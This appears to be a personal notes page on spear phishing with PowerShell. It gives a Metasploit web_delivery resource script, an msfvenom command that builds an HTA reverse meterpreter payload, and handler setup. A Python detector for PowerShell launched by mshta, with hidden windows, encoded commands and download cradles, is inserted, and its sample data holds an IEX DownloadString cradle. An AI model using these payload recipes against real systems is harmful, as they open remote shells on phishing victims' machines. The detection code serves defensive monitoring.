Spear Phishing with Powershell Day 2

Tutorial

See videos [1] and [2].

Other references
YouTube search keywords: metasploit powershell

64-bit payload

windows/x64/meterpreter/reverse_https

Web Delivery

Usage: msfconsole -r powershell_web_delivery.rc

# powershell_web_delivery.rc
use exploit/multi/script/web_delivery
set target 2
set SRVPORT 8081
set LPORT 443
set LHOST 123.123.123.123
set PAYLOAD windows/x64/meterpreter/reverse_https
set ExitOnSession false
exploit -j

msfvenom HTA

Generate the HTA file

msfvenom -p windows/meterpreter/reverse_tcp lhost=121.121.212.112 lport=8081 -f hta-psh -o test.hta

Server-side configuration

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 121.121.21.112
set LPORT 8081
set ExitOnSession false
exploit -j
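
From the defender's side, both the Web Delivery and the HTA paths above end in a powershell.exe process creation that shows up in endpoint logs. The following is an added example, not code from the original post: it checks process-creation events for PowerShell started by mshta.exe, hidden-window flags, and encoded or inline download cradles. The event fields (Sysmon Event ID 1 style), the sample command lines and the address 192.0.2.10 are constructed assumptions.

```python
import base64
import re

CRADLE = re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|\biex\b|invoke-expression")
HIDDEN = re.compile(r"(?i)(?:^|\s)[-/]w[a-z]*\s+(?:hidden|1)\b")

def decode_encoded_command(cmdline):
    """Decode the value of -EncodedCommand (also -ec or any prefix: -e, -enc, ...), or None."""
    toks = cmdline.split()
    for flag, value in zip(toks, toks[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] in "-/" and name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # invalid base64 or not UTF-16LE
                return None
    return None

def analyze(event):
    """Return the reasons a process-creation event looks like script-delivered PowerShell."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    cmd, reasons = event["CommandLine"], []
    if parent == "mshta.exe":
        reasons.append("powershell spawned by mshta.exe")
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    if CRADLE.search(cmd) or (decoded and CRADLE.search(decoded)):
        reasons.append("download cradle")
    return reasons

def enc(script):  # base64 of UTF-16LE, used only to build the sample data below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample events (assumed Sysmon Event ID 1 style fields); 192.0.2.10 is a documentation address.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8081/a')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell.exe -nop -w hidden -e " + enc(SCRIPT)},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell.exe -nop -w hidden -c " + SCRIPT},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    print([analyze(ev) for ev in EVENTS])
```

The whitespace tokenizer is a simplification; quoted arguments in real command lines need a proper Windows command-line parser.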

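web_delivery issue

A browser can download the PowerShell script.
From within PowerShell the download fails; it cannot connect to the server.

Fileless malware

60 Bytes - PowerShell Fileless Penetration Testing Experiment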
http://paper.seebug.org/243/

References

[1] Meterpreter via PowerShell Payload + UAC Bypass on Windows 7

[2] Kali Linux 2.0: How To Control PC With A Powershell - Metasploit

[3] Niche tool: Kalista

[4] I Have Two Guns: PowerShell + HTA